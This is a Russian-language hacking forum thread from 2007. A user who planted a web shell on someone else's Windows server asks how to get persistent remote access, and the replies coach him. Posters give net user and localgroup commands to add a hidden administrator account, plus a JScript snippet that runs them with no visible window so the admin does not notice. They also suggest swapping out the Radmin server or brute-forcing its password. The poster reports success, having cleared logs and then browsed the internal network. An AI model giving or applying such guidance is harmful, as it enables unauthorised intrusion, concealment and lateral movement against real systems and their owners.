Shell на Windows сервере

Discussion in 'Уязвимости' started by cyber$nake, 2 Oct 2007.

  1. cyber$nake

    cyber$nake Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    93
    Likes Received:
    11
    Reputations:
    0
    Всем здрасте!

    Ситуация следующая: Залил web-shell на веб-сервер. ОС сервера - Windows 2000 server. Полазив по серверу нашел установленный radmin 2.1 . Попробовав законнектиться радмином к этому серваку появилось окно ввода (логин, пароль).
    ----------------------------------------------------------
    Соединение с host
    Версия сервера 2.1
    Соединение с host
    Аутентификация Windows: Использование имени
    пользователя/пароля/домена текущего пользователя
    ----------------------------------------------------------
    Вопрос: можно ли какнить узнать пасс (кроме того как спросить у админа). Или посоветуйте, что можно еще поставить для удаленного управления.

    Всем за ранее спасибо.
     
    #1 cyber$nake, 2 Oct 2007
    Last edited: 2 Oct 2007
    1 person likes this.
  2. ThreeD

    ThreeD Banned

    Joined:
    25 Dec 2006
    Messages:
    128
    Likes Received:
    112
    Reputations:
    9
    Лови: http://forum.antichat.ru/thread13658.html
    Информативно.
    Должно помочь в решении твоей проблемы.
     
  3. n0ne

    n0ne Elder - Старейшина

    Joined:
    1 Jan 2007
    Messages:
    542
    Likes Received:
    284
    Reputations:
    -56
    Если есть права на запись, то сноси сервер радмина, который установлен там, и ставь свой, ну т.е. настроеный на твоем компе, с паролем который ты знаешь :) Если нет прав на запись, то только брут наверн, или может есть таки приватный bypass.
     
  4. cyber$nake

    cyber$nake Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    93
    Likes Received:
    11
    Reputations:
    0

    самое главное, что права админские, потому, что я логи апатча почистил и все нормально сохранилось.

    и если я снесу радмин который стоит на ентом серваке, меня сразу спалят.
     
    #4 cyber$nake, 3 Oct 2007
    Last edited: 3 Oct 2007
  5. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    создай нового юзера, и зайди через Удален.Раб.Стол под ним...
     
    #5 aka PSIH, 3 Oct 2007
    Last edited: 3 Oct 2007
  6. cyber$nake

    cyber$nake Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    93
    Likes Received:
    11
    Reputations:
    0
    спасибо за советы, теперь подскажите как мне создать юзера, если я нахожусь на сервере с помощью шела (r57shell) ?
     
  7. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    можно у себя на компе создать .bat файл, потом загрузить его на сервер и запустить,
    можно просто через cmd на сервере:

    net user USERNAME PASSWORD /add
    net localgroup Administrators USERNAME /add
     
    1 person likes this.
  8. cyber$nake

    cyber$nake Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    93
    Likes Received:
    11
    Reputations:
    0

    спасибо :)
     
  9. Sn@k3

    Sn@k3 Elder - Старейшина

    Joined:
    13 Apr 2006
    Messages:
    1,000
    Likes Received:
    438
    Reputations:
    90
    А терь попробуй это рподелать с правами гостя ))))))))))))))))) ыыы посмотрю я на твою рожу)))


    это всё тогда уж пихаем в bat и в автозагрузку, тока вот проблема, адмен заметит твоё черное окошко, выход из ситуации ищи сам, ибо не позорь священое имя снейка. -)
     
    1 person likes this.
  10. f1rebl00d

    f1rebl00d Elder - Старейшина

    Joined:
    27 Dec 2006
    Messages:
    25
    Likes Received:
    34
    Reputations:
    15
    Эти действия можа сделать и через JavaScript или VBScript, при етом окошко не будет! что нам и надо.
     
    #10 f1rebl00d, 3 Oct 2007
    Last edited: 3 Oct 2007
    2 people like this.
  11. cyber$nake

    cyber$nake Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    93
    Likes Received:
    11
    Reputations:
    0
    поподробнее пжалста!
     
  12. f1rebl00d

    f1rebl00d Elder - Старейшина

    Joined:
    27 Dec 2006
    Messages:
    25
    Likes Received:
    34
    Reputations:
    15
    Самый простой способ, создай файл с расширением JS

    Вот код:

    Code:
    var Myshell = WScript.CreateObject("WScript.Shell")        // Объект Shell
    Myshell.Run("net user <user> <pass> /add", 0)
    Myshell.Run("net localgroup Administrators <user> /add", 0)
    
     
  13. aka PSIH

    aka PSIH Elder - Старейшина

    Joined:
    7 Feb 2006
    Messages:
    582
    Likes Received:
    284
    Reputations:
    51
    Ты возможно слепой но ТС писал:
    самое главное, что права админские

    Далеко не факт что админ за сервером 24 часа в сутки, можно найти время когда он не заметит как окошко вылезит на 2 секунды...
     
  14. cyber$nake

    cyber$nake Elder - Старейшина

    Joined:
    27 Mar 2007
    Messages:
    93
    Likes Received:
    11
    Reputations:
    0
    всем большое спасибо за помощь, все получилось, даже по внутренней сетке полазил, но ни чего интересного не нашел.